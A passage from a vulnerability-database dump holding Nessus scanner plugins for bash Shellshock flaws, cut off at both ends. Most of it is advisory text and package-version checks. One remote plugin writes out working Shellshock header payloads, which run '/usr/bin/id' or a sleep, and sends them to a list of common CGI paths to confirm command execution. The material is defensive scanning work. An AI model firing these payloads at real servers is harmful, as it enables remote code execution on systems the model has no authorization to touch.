setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-27T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2022-05-09T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:bash", "p-cpe:/a:zte:cgsl_main:bash-debuginfo", "p-cpe:/a:zte:cgsl_main:bash-debugsource", "p-cpe:/a:zte:cgsl_main:bash-devel", "p-cpe:/a:zte:cgsl_main:bash-doc", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/154582", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0118. 
The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154582);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple\nvulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in\n the values of environment variables, which allows remote attackers to write to files or possibly have\n unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute\n arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted\n SHELLOPTS and PS4 environment variables. 
(CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-0634\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-7543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bash packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'bash-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debuginfo-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debugsource-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-devel-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-doc-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n 
severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bash');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:52:27", "description": "The remote web server is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-04-06T00:00:00", "type": "nessus", "title": "GNU Bash Incomplete Fix Remote Code Injection (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_6278.NASL", "href": "https://www.tenable.com/plugins/nessus/82581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82581);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6278\");\n script_bugtraq_id(70166);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GNU Bash Incomplete Fix Remote Code Injection (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote web server is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nNote that this vulnerability exists because of an incomplete fix for\nCVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6278\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/26\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_timeout(480);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Do not use get_http_port() here\nport = get_kb_item(\"Services/www\");\nif (!port) port = 80;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Do not test broken web servers\nbroken_web = get_kb_item(\"Services/www/\" + port + \"/broken\");\n\n# Do not test CIM servers as HTTP GET requests can lead to FP situations\nif (port == get_kb_item(\"Services/cim_listener\") || broken_web)\n exit(0, 'The web server on port ' +port+ ' is broken.');\n\ncgis = make_list('/');\n\ncgis1 = get_kb_list('www/'+port+'/cgi');\nif (!isnull(cgis1)) cgis = make_list(cgis, cgis1);\n\ncgidirs = get_kb_list('www/'+port+'/content/extensions/*');\nif (!isnull(cgidirs) && !thorough_tests)\n{\n foreach dir (cgidirs)\n {\n if (preg(pattern:'^/+cgi-bin', string:dir, icase:TRUE))\n cgis = make_list(dir, cgis);\n }\n}\n\n# Add common cgi scripts\ncgis = list_uniq(make_list(cgis,\n \"/_mt/mt.cgi\",\n \"/admin.cgi\",\n \"/administrator.cgi\",\n \"/buglist.cgi\",\n \"/cgi/mid.cgi\",\n \"/cgi-bin/admin\",\n \"/cgi-bin/admin.cgi\",\n \"/cgi-bin/admin.pl\",\n 
\"/cgi-bin/administrator\",\n \"/cgi-bin/administrator.cgi\",\n \"/cgi-bin/agorn.cgi\",\n \"/cgi-bin/bugreport.cgi\",\n \"/cgi-bin/cart.cgi\",\n \"/cgi-bin/clwarn.cgi\",\n \"/cgi-bin/count.cgi\",\n \"/cgi-bin/Count.cgi\",\n \"/cgi-bin/faqmanager.cgi\",\n \"/cgi-bin/FormHandler.cgi\",\n \"/cgi-bin/FormMail.cgi\",\n \"/cgi-bin/guestbook.cgi\",\n \"/cgi-bin/help.cgi\",\n \"/cgi-bin/hi\",\n \"/cgi-bin/index.cgi\",\n \"/cgi-bin/index.pl\",\n \"/cgi-bin/index.sh\",\n \"/cgi-bin/login\",\n \"/cgi-bin/login.cgi\",\n \"/cgi-bin/mailit.pl\",\n \"/cgi-bin/mt/mt-check.cgi\",\n \"/cgi-bin/mt/mt-load.cgi\",\n \"/cgi-bin/mt-static/mt-check.cgi\",\n \"/cgi-bin/mt-static/mt-load.cgi\",\n \"/cgi-bin/ncbook/book.cgi\",\n \"/cgi-bin/printenv\",\n \"/cgi-bin/printenv.cgi\",\n \"/cgi-bin/quickstore.cgi\",\n \"/cgi-bin/search\",\n \"/cgi-bin/search.cgi\",\n \"/cgi-bin/search/search.cgi\",\n \"/cgi-bin/status\",\n \"/cgi-bin/status.cgi\",\n \"/cgi-bin/test.cgi\",\n \"/cgi-bin/test.sh\",\n \"/cgi-bin/test-cgi\",\n \"/cgi-bin/upload.cgi\",\n \"/cgi-bin/urlcount.cgi\",\n \"/cgi-bin/viewcvs.cgi\",\n \"/cgi-bin/wa\",\n \"/cgi-bin/wa.cgi\",\n \"/cgi-bin/wa.exe\",\n \"/cgi-bin/whois.cgi\",\n \"/cgi-bin-sdb/printenv\",\n \"/cgi-mod/index.cgi\",\n \"/cgi-sys/defaultwebpage.cgi\",\n \"/cgi-sys/entropysearch.cgi\",\n \"/index.cgi\",\n \"/index.pl\",\n \"/index.sh\",\n \"/nph-mr.cgi\",\n \"/query.cgi\",\n \"/session_login.cgi\",\n \"/show_bug.cgi\",\n \"/test\",\n \"/test.cgi\",\n \"/ucsm/isSamInstalled.cgi\",\n \"/whois.cgi\",\n \"/wp-login.php\",\n \"/wwwadmin.cgi\",\n \"/wwwboard.cgi\",\n \"/xampp/cgi.cgi\"));\n\nif (thorough_tests) exts = make_list(\"*\");\nelse exts = make_list(\"cgi\", \"php\", \"php5\", \"pl\", \"py\", \"rb\", \"sh\", \"java\", \"jsp\", \"action\", \"do\", \"shtml\");\n\nforeach ext (exts)\n{\n cgis2 = get_kb_list('www/'+port+'/content/extensions/'+ext);\n if (!isnull(cgis2)) cgis = list_uniq(make_list(cgis2, cgis));\n}\n\nif ( thorough_tests )\n headers = 
make_list('User-Agent', 'Referrer', 'Cookie');\nelse\n headers = make_list('User-Agent');\n\nscript = SCRIPT_NAME - \".nasl\";\nint1 = rand() % 100;\nint2 = rand() % 100;\n\n\n\nEXPLOIT_TYPE_WAIT = 0;\nEXPLOIT_TYPE_STDOUT = 1;\n\n\nexploits = make_list();\nn = 0;\n\nexploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_STDOUT,\n\t\"payload\", '() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo \"' + script+' Output : $((' + int1 + '+'+int2+'))\"; }',\n \t\"pattern\", script + \" Output : \" + int(int1 + int2),\n\t\"followup\", \"() { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; }\"\n\t);\nif (report_paranoia == 2)\n{\n exploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_WAIT,\n\t\"payload\", '() { _; } >_[$($())] { echo; /bin/sleep $WAITTIME; }'\n\t);\n}\n\n\nvuln = FALSE;\nWaitTime = 5;\n\nforeach cgi (cgis)\n{\nforeach exploit ( exploits )\n{\n foreach header (headers)\n {\n then = unixtime();\n\n if ( exploit[\"type\"] == EXPLOIT_TYPE_WAIT && report_paranoia == 2 )\n {\n http_set_read_timeout(WaitTime * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime), string:exploit[\"payload\"]);\n }\n else payload = exploit[\"payload\"];\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, payload),\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Check that we added our two random numbers and get our expected output\n # ie : int1 = 40, int2 = 65 output should be the following :\n # bash_cve_2014_6271_rce Output : 105\n if (exploit[\"type\"] == EXPLOIT_TYPE_STDOUT && exploit[\"pattern\"] >< res[2])\n {\n vuln = TRUE;\n attack_req = http_last_sent_request();\n\n match = pregmatch(pattern:\"(\"+exploit[\"pattern\"]+\")\", string:res[2]);\n if (isnull(match) || empty_or_null(match[1])) output = chomp(res[2]);\n else output = match[1];\n\n # Try and run id if our above request was a success\n res2 = http_send_recv3(\n method : \"GET\",\n port : 
port,\n item : cgi,\n add_headers : make_array(header, exploit[\"followup\"]),\n exit_on_fail : TRUE\n );\n\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res2[2]))\n {\n attack_req = http_last_sent_request();\n match2 = pregmatch(pattern:\"(uid=[0-9]+.*gid=[0-9]+.*)\",string:res2[2]);\n\n if (isnull(match2) || empty_or_null(match2[1])) output = chomp(res2[2]);\n else output = match2[1];\n }\n }\n else if ( report_paranoia == 2 && exploit[\"type\"] == EXPLOIT_TYPE_WAIT && now - then >= WaitTime )\n {\n InitialDelta = now - then;\n attack_req = http_last_sent_request();\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n WaitTime1 = WaitTime;\n vuln = TRUE;\n\n # Test again with sleep set to 5, 10, and 15\n wtimes = make_list(5, 10, 15);\n\n for ( i = 0 ; i < max_index(wtimes) && vuln == TRUE; i ++ )\n {\n WaitTime1 = wtimes[i];\n http_set_read_timeout(WaitTime1 * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime1), string:exploit[\"payload\"]);\n then1 = unixtime();\n res = http_send_recv3(method : \"GET\", port : port, item : cgi, add_headers : make_array(header, payload), exit_on_fail : FALSE);\n now1 = unixtime();\n\n if ( now1 - then1 >= WaitTime1 && now1 - then1 <= (WaitTime1 + 5 ))\n {\n attack_req = http_last_sent_request();\n InitialDelta = now1 - then1;\n output = \"The request produced a wait of \" + InitialDelta + \" seconds\";\n continue;\n }\n else\n {\n\tvuln = FALSE;\n }\n }\n }\n if (vuln) break;\n }\n if (vuln) break;\n }\n if (vuln) break;\n}\n\n\nif (!vuln) exit(0, \"The web server listening on port \"+port+\" is not affected.\");\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 2,\n request : make_list(attack_req),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:26", "description": "An updated rhev-hypervisor6 package that fixes several security 
issues is now available.\n\nRed Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One) input from certain RSA signatures. A remote attacker could use this flaw to forge RSA certificates by providing a specially crafted signature to an application using NSS. 
(CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product Security Incident Response Team as the original reporters of CVE-2014-1568. The CVE-2014-7186 and CVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1568", "CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-1354.NASL", "href": "https://www.tenable.com/plugins/nessus/79053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1354. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79053);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-1568\",\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"RHSA\", value:\"2014:1354\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2014:1354) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An updated rhev-hypervisor6 package that fixes several security issues\nis now available.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. 
Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation\nOne) input from certain RSA signatures. A remote attacker could use\nthis flaw to forge RSA certificates by providing a specially crafted\nsignature to an application using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting\nCVE-2014-6271, and the Mozilla project for reporting CVE-2014-1568.\nUpstream acknowledges Antoine Delignat-Lavaud and Intel Product\nSecurity Incident Response Team as the original reporters of\nCVE-2014-1568. 
The CVE-2014-7186 and CVE-2014-7187 issues were\ndiscovered by Florian Weimer of Red Hat Product Security.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1354\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-1568\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-6271\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rhev-hypervisor6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = 